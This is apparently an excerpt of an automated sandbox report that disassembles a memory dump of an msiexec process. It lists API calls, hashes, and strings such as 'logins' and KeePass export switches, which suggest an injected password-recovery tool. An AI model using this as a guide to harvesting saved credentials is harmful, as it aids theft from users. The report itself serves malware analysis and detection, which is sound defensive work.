                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                    • String ID: logins$null
                                                                    • API String ID: 2148543256-2163367763
                                                                    • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                    • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                    APIs
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    • memset.MSVCRT ref: 004085CF
                                                                    • memset.MSVCRT ref: 004085F1
                                                                    • memset.MSVCRT ref: 00408606
                                                                    • strcmp.MSVCRT ref: 00408645
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                    • memset.MSVCRT ref: 0040870E
                                                                    • strcmp.MSVCRT ref: 0040876B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                    • String ID: ---
                                                                    • API String ID: 3437578500-2854292027
                                                                    • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                    • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041087D
                                                                    • memset.MSVCRT ref: 00410892
                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                                                    • DeleteObject.GDI32(?), ref: 004109D0
                                                                    • DeleteObject.GDI32(?), ref: 004109D6
                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                    • String ID:
                                                                    • API String ID: 1010922700-0
                                                                    • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                    • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                    APIs
                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                    • malloc.MSVCRT ref: 004186B7
                                                                    • free.MSVCRT ref: 004186C7
                                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                    • free.MSVCRT ref: 004186E0
                                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                    • malloc.MSVCRT ref: 004186FE
                                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                    • free.MSVCRT ref: 00418716
                                                                    • free.MSVCRT ref: 0041872A
                                                                    • free.MSVCRT ref: 00418749
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free$FullNamePath$malloc$Version
                                                                    • String ID: |A
                                                                    • API String ID: 3356672799-1717621600
                                                                    • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                    • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp
                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                    • API String ID: 2081463915-1959339147
                                                                    • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                    • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                    • API String ID: 2012295524-70141382
                                                                    • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                    • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                    • API String ID: 667068680-3953557276
                                                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                    • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1700100422-0
                                                                    • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                    • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                    • String ID:
                                                                    • API String ID: 552707033-0
                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf
                                                                    • String ID: %%0.%df
                                                                    • API String ID: 3473751417-763548558
                                                                    • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                    • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                    APIs
                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                                    • GetParent.USER32(?), ref: 00406136
                                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                    • String ID: A
                                                                    • API String ID: 2892645895-3554254475
                                                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                    APIs
                                                                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                    • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                    • memset.MSVCRT ref: 0040DA23
                                                                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                    • String ID: caption
                                                                    • API String ID: 973020956-4135340389
                                                                    • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                    • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                    APIs
                                                                    Strings
                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                    • API String ID: 1283228442-2366825230
                                                                    • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                    • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                    APIs
                                                                    • wcschr.MSVCRT ref: 00413972
                                                                    • wcscpy.MSVCRT ref: 00413982
                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                    • wcscpy.MSVCRT ref: 004139D1
                                                                    • wcscat.MSVCRT ref: 004139DC
                                                                    • memset.MSVCRT ref: 004139B8
                                                                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                    • memset.MSVCRT ref: 00413A00
                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                    • wcscat.MSVCRT ref: 00413A27
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                    • String ID: \systemroot
                                                                    • API String ID: 4173585201-1821301763
                                                                    • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                    • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy
                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                    • API String ID: 1284135714-318151290
                                                                    • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                    • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                    APIs
                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                    • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                    • strchr.MSVCRT ref: 0040C140
                                                                    • strchr.MSVCRT ref: 0040C151
                                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                                    • memset.MSVCRT ref: 0040C17A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                    • String ID: 4$h
                                                                    • API String ID: 4019544885-1856150674
                                                                    • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                    • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                    • String ID: 0$6
                                                                    • API String ID: 4066108131-3849865405
                                                                    • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                    • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004082EF
                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                    • memset.MSVCRT ref: 00408362
                                                                    • memset.MSVCRT ref: 00408377
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
